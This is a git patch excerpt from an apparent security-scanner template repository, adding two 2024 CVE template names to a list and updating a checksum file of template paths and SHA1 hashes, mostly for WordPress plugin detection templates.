a/.new-additions b/.new-additions index 472a68f10b4..be9a06be7bd 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,8 @@ http/cves/2023/CVE-2023-4220.yaml http/cves/2023/CVE-2023-44012.yaml http/cves/2024/CVE-2024-2330.yaml http/cves/2024/CVE-2024-3742.yaml +http/cves/2024/CVE-2024-4879.yaml +http/cves/2024/CVE-2024-5217.yaml http/exposed-panels/gradle/gradle-develocity-panel.yaml http/exposures/configs/snoop-servlet-exposure.yaml http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml From 6262f1359171aafbda50a021d5cdea1863a39bfe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 04:44:07 +0000 Subject: [PATCH 146/247] Auto Generated Templates Checksum [Mon Jul 15 04:44:07 UTC 2024] :robot: --- templates-checksum.txt | 409 +++++++++++++++++++++-------------------- 1 file changed, 205 insertions(+), 204 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 20bd3ba60f9..abe35b6839e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -787,7 +787,7 @@ helpers/wordpress/plugins/easy-google-fonts.txt:775bbc46d0bc85e121db86ae12b2993f helpers/wordpress/plugins/easy-table-of-contents.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/easy-wp-smtp.txt:01b1c534c2db2eebe8eb41bca1f0ffc4193b0e3f helpers/wordpress/plugins/elementor.txt:9e43adc2b2562071078f6f82962886b245d01a6a -helpers/wordpress/plugins/elementskit-lite.txt:b981b5efd3a591e7a7cda1a4740574ce3b34b19a +helpers/wordpress/plugins/elementskit-lite.txt:998d4ef3e7a6039ddbf0f888a2fd1c5243f7318b helpers/wordpress/plugins/enable-media-replace.txt:02c0165b5afcee9880bd9f9df6fd96ec80b231d4 helpers/wordpress/plugins/envato-elements.txt:56edf1b708bdabe845695022e07cf4185f4dcad7 helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:ccf30be4f6440a2ed97fd66ad803378be157d525 @@ -929,7 +929,7 @@ helpers/wordpress/plugins/wordfence.txt:40c453bafd4ebdb4a4b38416eb90fd03d3073fc3 helpers/wordpress/plugins/wordpress-importer.txt:d195b61caef74dab647d06101869c0863fff7a69 helpers/wordpress/plugins/wordpress-seo.txt:e897fca0b3c8ab2a2a6dfca6e49d92a8ba550aaa helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf -helpers/wordpress/plugins/wp-fastest-cache.txt:0489698a3b78229a8b5df0f360850ce63827cf67 +helpers/wordpress/plugins/wp-fastest-cache.txt:2e3c1317d99e9b751581574ebe5b0f4a32eea831 helpers/wordpress/plugins/wp-file-manager.txt:8c4e6ce593239d9464a2d3eb48692924898625be helpers/wordpress/plugins/wp-google-maps.txt:a7271cc82e11f6991ba3e441b86276cbfd98f338 helpers/wordpress/plugins/wp-mail-smtp.txt:9a0a06f6eb18bf496057acce15162dc100f43480 @@ -3492,6 +3492,7 @@ http/cves/2024/CVE-2024-4434.yaml:832631bb51317578dff7d1f78cc15a33ffe9c00a http/cves/2024/CVE-2024-4443.yaml:bd877d88a3381249f47f17961c167cb8ae3bfaa9 http/cves/2024/CVE-2024-4577.yaml:c53e4d3f699e49597036f2b9e5ea8ab75e67904b http/cves/2024/CVE-2024-4836.yaml:2dd1cd40b76fc713b718db4852eb9bca8cf67380 +http/cves/2024/CVE-2024-4879.yaml:ff11adf8264ac17f5c4b5e238d32016c92492b75 http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5084.yaml:8ede90fad7058c4a2a7499562f98cacae32ede68 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c @@ -5823,7 +5824,7 @@ http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac http/misconfiguration/misconfigured-concrete5.yaml:d56475cb0edd78cf18150ac40eba183c0a201d7d http/misconfiguration/misconfigured-docker.yaml:ca18899f575d3f7df82e3a33e2a9b4b0f75582ef http/misconfiguration/missing-sri.yaml:1bc66d65f6b661a47fc8925571630064bbcd8e40 -http/misconfiguration/mixed-active-content.yaml:ceb7f34460e65ee99552442d17590a164b60d28e +http/misconfiguration/mixed-active-content.yaml:6802abd7b12e82a87a10147547a197d1e6756030 http/misconfiguration/mixed-passive-content.yaml:58ad91895597b997aadc184d4489f699e8b886dc http/misconfiguration/mlflow-unauth.yaml:782c87a81f600d3dd2782e60f63080d361abbb93 http/misconfiguration/mobiproxy-dashboard.yaml:4d76a953ef877f0847e2722091d679b905023cc8 @@ -7279,228 +7280,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:2c03be2a489d02086e8813d7ad847c0ad3dd7aed -http/technologies/wordpress/plugins/add-to-any.yaml:3aa9016ef0d3ea59baa3fe10c9adf934be896387 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:894597d021248e51e6a89adc455688ef7478c067 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:99e512547b8ccd401a46cd9c39584fa5804eca70 -http/technologies/wordpress/plugins/akismet.yaml:a01aefeac3fcfeebfb1af663a2d78ed6898e7170 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:237029cee578746310d220dc0a9673052fa1f525 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:90b75d28fcb36d92c4edc2a2441c00edbfc45181 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:03eaa1bfc120647a3d2a5e9cc574ee6cd3705f5d -http/technologies/wordpress/plugins/amp.yaml:7e933d54de0c7c47f5610cfb4340f36150e753c5 -http/technologies/wordpress/plugins/antispam-bee.yaml:e5e3072d23794684cafa941394b46fd96a28adaa -http/technologies/wordpress/plugins/astra-sites.yaml:7bbc9d8214f5301a1ae996d1bff4277eb28bd904 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:bd4204a8d3304faf8f87a47f16fd7050ab837076 -http/technologies/wordpress/plugins/backwpup.yaml:5c96d6d1cc1e4c06630a430c38947c7a98954488 -http/technologies/wordpress/plugins/better-search-replace.yaml:a1a8ab4353c0dd975cc6922ca883f85b3babab8b -http/technologies/wordpress/plugins/better-wp-security.yaml:9238b4e15a9c87629b34b378bf6dd5bafbb9268a -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:da7756b499eb168d91279ffcb8300024170b8ed4 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1a97cb21f5bc2880fcb34e370f42edbf1b2cb25f -http/technologies/wordpress/plugins/breeze.yaml:de3c7485b46fe3723c378d33c66303ada6ab08c9 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0c5e75220423ab609c0cec2f9d8bba9da6a6a745 -http/technologies/wordpress/plugins/chaty.yaml:4b22e2f7d14295a1397a0501b749824b20e51562 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:448b32b3a09451524b4611bb574a0af514d3d112 -http/technologies/wordpress/plugins/classic-editor.yaml:f9de7282e8a4f3636f8289a74892ab1b133709e2 -http/technologies/wordpress/plugins/classic-widgets.yaml:0671a4fb0b3a51406a7cd855b58aabea7fd4fdbc -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:8cb9275d92436c072ba9e5fe7673fa4df48bc3a9 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:262d760e3cabbf08044b70eaa37648444a513e10 -http/technologies/wordpress/plugins/coblocks.yaml:74c1b3d0a30c62f647866d328875034cf03e767d -http/technologies/wordpress/plugins/code-snippets.yaml:a415bf81573b7cd6e21cf80c977d15217b66733c -http/technologies/wordpress/plugins/coming-soon.yaml:56ff6cd44ed553dab7557381f6826bc22be6d0d6 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:45ab5ff533729da12df15efdc2af5d6076dd63dd -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:25f25560c6191b9b13dcdd39f20657817f8dd712 -http/technologies/wordpress/plugins/contact-form-7.yaml:9b18111c1d3ef8aa0a9a14e3c3d1dee75519e022 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:dc6f12cabb4452f9b7db40f2d0f4cf6014dc5e9f -http/technologies/wordpress/plugins/cookie-law-info.yaml:501cfd5ed8d2a41ccc66e8ec96ff4e46ccc4b04f -http/technologies/wordpress/plugins/cookie-notice.yaml:0ea921a09cf09548d3abe14ccaeb61c1d4dfd3f0 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:697e73fbdd31131bd35754609055121a41f6b699 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fe531b3a2df00eba3c75bc0d5e18bb9e62ae0815 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:0643adbb4d743a10d1bbd05c906648dbe02e7c88 -http/technologies/wordpress/plugins/custom-css-js.yaml:0a11dbe86ab9af4a07081863b6ca28fa83ab3d48 -http/technologies/wordpress/plugins/custom-fonts.yaml:d213744fc302ec5e41520e3eb0ff9d6c087257f0 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:b86c36e18e98abb66200d31e62a2cfa618a65347 -http/technologies/wordpress/plugins/disable-comments.yaml:b9954696703cd77dad4562e4a870d90db913aa19 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:a9de4d801db7404bf6111de593ed5c7beac7f466 -http/technologies/wordpress/plugins/duplicate-page.yaml:b61ff2fd9af8662e12e8821f423c24a057cb6fb6 -http/technologies/wordpress/plugins/duplicate-post.yaml:25e0e3e800e8f46ab2a2800b87c945113b90bdc6 -http/technologies/wordpress/plugins/duplicator.yaml:d1938650069f7fb44bb02fef3235903d68e1097c -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:9e3cec9b2c2aa99fc3eaef3e4f67dd9e26fadfc0 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:9df52d4dd2ad983b95d13d01fea04d7cb4ab9186 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:0efe2acb79d92e43fa27ee792d4a445f4da498f2 -http/technologies/wordpress/plugins/elementor.yaml:075b0eaf190ad5e07b7cc2ce6d15da4371304a9f -http/technologies/wordpress/plugins/elementskit-lite.yaml:f96f931d9114e6c50c582a0f4b55a8aeef11cf9b -http/technologies/wordpress/plugins/enable-media-replace.yaml:cfd487b799aed774eab97f87dd4beca2badc2a8d -http/technologies/wordpress/plugins/envato-elements.yaml:900c7cfca6b5ad9094a21de641bb8e7c09dedcf0 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:2fbe3fcb3a109eab37083c0ce2eef2e2ae4c73f0 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:e2833cfec91fa398f733fa5c7fd20f655a64dd19 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:5c630ddc25ea75968102b5be615133102f65623d -http/technologies/wordpress/plugins/fast-indexing-api.yaml:88958a991d8f65107a22b6efa0218c3addca4f5a -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:31ead4d39fadbc3f8f51bdae32da544c7621e243 -http/technologies/wordpress/plugins/flamingo.yaml:cabffa25c6b74c0fb96a850808efc17af8960e27 -http/technologies/wordpress/plugins/fluentform.yaml:45b3e3507dfb7537013958f1b1938486f11fb4db -http/technologies/wordpress/plugins/font-awesome.yaml:b9f79da55fe2e338677134b9469b27f8c533b7fa -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:ab286fe8d474744addd416fe694177c379b8adb2 -http/technologies/wordpress/plugins/formidable.yaml:061286a76e8413a9756d922d5194f7e0a65ea77d -http/technologies/wordpress/plugins/forminator.yaml:e97ae70c01240face06261a9f845348ace00535d -http/technologies/wordpress/plugins/ga-google-analytics.yaml:8e36c7424c04795162da1bc1834a8f818266be4e -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:6a46376b02ee5306a2f20ab7033f072daf7c539d -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:fdea706017e0db8cd8e9e4d0cc9fe17779681d87 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:b4eea842f7523c7e210167711d49f2e3526aaf79 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:0bf94e3ac16b15ceebbb256e69da1640f3e7f1c6 -http/technologies/wordpress/plugins/google-site-kit.yaml:c18fec58aa1ded2b835e2d7201687d89eb6e395c -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:646b7cb1fb9d863349d8b6ca8533e02cffd66bd8 -http/technologies/wordpress/plugins/gtranslate.yaml:c411195113f912afa9161125912e6a37d2962f5e -http/technologies/wordpress/plugins/gutenberg.yaml:0e9a8ac60beaa55c4d2d1f363d4f833113510a33 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:f7f0221d1f60d6f81ff3bfff8c5b342a8e8155f3 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:84f78e7fff0b60ee84c8188955a94fb3745ad5cc -http/technologies/wordpress/plugins/header-footer-elementor.yaml:7867117407e2df15683be3e1b07e41836d36ae75 -http/technologies/wordpress/plugins/header-footer.yaml:7669c8459c89b251840c38c0a984af4a71880909 -http/technologies/wordpress/plugins/health-check.yaml:aed888b41eb3744f0d3d5e0e358b202406809bc2 -http/technologies/wordpress/plugins/hello-dolly.yaml:bd3c195bb7b52f99492666ad723cbeebb4181104 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:5abaae0d471062ba8bfbc49584f99420b385b364 -http/technologies/wordpress/plugins/hostinger.yaml:085205e8fecbb363eb3761569677e0f9a751043f -http/technologies/wordpress/plugins/image-optimization.yaml:a34c72cf076e43b686893a6fa43bddd0764ac943 -http/technologies/wordpress/plugins/imagify.yaml:7379982e337b1d2ba55d8b15a826a0c8b1cd0390 -http/technologies/wordpress/plugins/imsanity.yaml:799da31660dcea941a50e0c864d0cbdd34970b99 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:c4e64f6e4a9790c57ea04e6b3202721290662ae4 -http/technologies/wordpress/plugins/instagram-feed.yaml:06c1b31b8e4327122c5852eff112036bb3eafe46 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:f50ff24cc250751d04b1855285357bbd72ac7507 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:3c9a775ac2b46f4f6324a628d9c8579d3aff74f3 -http/technologies/wordpress/plugins/jetpack.yaml:7c86431be04ac1a6221fefbb83d7f2f4b502617e -http/technologies/wordpress/plugins/kadence-blocks.yaml:8325c2770e8f5ea58a8b4d4d76abea9fb0ff9302 -http/technologies/wordpress/plugins/kirki.yaml:45a1d73a1e202bcd32e919899e3b3576f13beb22 -http/technologies/wordpress/plugins/leadin.yaml:9789b925d06c78e4c9bacd5ffd124abaaf7284ab -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:12190d9f75ccebe1b916d722d4c1fbe3822329be -http/technologies/wordpress/plugins/limit-login-attempts.yaml:2ab47cc04451ffa9d2fb6b5cbc5e9394c26781c6 -http/technologies/wordpress/plugins/litespeed-cache.yaml:3ec74d723dfa9be2ed9347e9c6e8a0c4c14bb2f8 -http/technologies/wordpress/plugins/loco-translate.yaml:a7350b2f883e5d952aebf0e6b43f18ee9244a1c6 -http/technologies/wordpress/plugins/loginizer.yaml:723ba128e6f6f614f9374a6000f3eb6b7d4cebae +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:b2b36f93092790fb749aff90eb816d0f2257765e -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:475c358317283c4ab74e86f026f4af65d831036c -http/technologies/wordpress/plugins/mailpoet.yaml:36632598b60cfb51cbbaa4a57684bd1421e5cc31 -http/technologies/wordpress/plugins/maintenance.yaml:ecbb5ce74c9d1aec6cdda9282f71f0b584023179 -http/technologies/wordpress/plugins/mainwp-child.yaml:01210f43653a3801d965ecc7ede11dd9cef138ef -http/technologies/wordpress/plugins/malcare-security.yaml:cdce76b1fdf36a07e2dae705e0be8f87ca240985 -http/technologies/wordpress/plugins/megamenu.yaml:e63cf2f31eb6976c6aa9a529c33391061e9aab74 -http/technologies/wordpress/plugins/members.yaml:1453ab0f4f96b42f315bd072cc2767bde66694da -http/technologies/wordpress/plugins/meta-box.yaml:7cc79d5cc817974dae0d9c45759f03fa95440d0b -http/technologies/wordpress/plugins/metform.yaml:0e9e3ff5a97337e55b935684061b03e0f404cc2c -http/technologies/wordpress/plugins/ml-slider.yaml:38ebf507f1a692dcb03078b92a6b99aed805827b -http/technologies/wordpress/plugins/newsletter.yaml:4862cd8a417ce395a8abb63d2ef362804b1183ab -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:08490d87cf71e80f70d41d07bb0dc27818b8331c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:c314a17a12150a7f83081de290549e9233ef7ec3 -http/technologies/wordpress/plugins/ninja-forms.yaml:b043099ac616b288cb3a23e9524a48a6f199766d -http/technologies/wordpress/plugins/ocean-extra.yaml:6caac7cea926f1f1e42d2395da5199a6666406ba -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:353e654021b5a26d8c1ec3bcf1626d287491869b -http/technologies/wordpress/plugins/one-click-demo-import.yaml:7b8ea058ca4b27936808174d200a1e60196ca3a0 -http/technologies/wordpress/plugins/optinmonster.yaml:83663131314272425ba1cb88f287384a26aa8668 -http/technologies/wordpress/plugins/otter-blocks.yaml:e8a0ed3724fd0e1f9cdbbc018e90ae85f0e505db -http/technologies/wordpress/plugins/password-protected.yaml:02f493156cf9cfc2c96d91fc27ddce6543fdd0de -http/technologies/wordpress/plugins/pdf-embedder.yaml:475edf2c715b2260b00eb8866b7f243f43e39e46 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 